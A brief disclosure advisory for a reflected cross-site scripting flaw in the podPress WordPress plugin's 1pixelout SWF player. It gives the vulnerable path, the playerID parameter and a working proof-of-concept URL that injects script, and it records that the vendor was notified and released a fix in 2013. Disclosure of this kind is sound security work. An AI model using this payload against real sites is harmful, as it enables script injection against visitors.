———————————————————————————————————————–
podPress adds a lot of features designed to make WordPress the ideal platform for hosting a podcast.
————————————————————————————————————————-
vulnerable path:
/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf
vulnerabile parameter:playerID
POC:
/wp-content/plugins/podpress/players/1pixelout/1pixelout_player.swf?playerID=\"))}catch(e){alert(/xss/)}//
————————————————————————————————————————-
————
Patch:
————
– Vendor was notified on the 25/02/2013
– Vendor released version 8.8.10.17 on 19/03/2013 Fixed the bug
————————————————————————————————————————-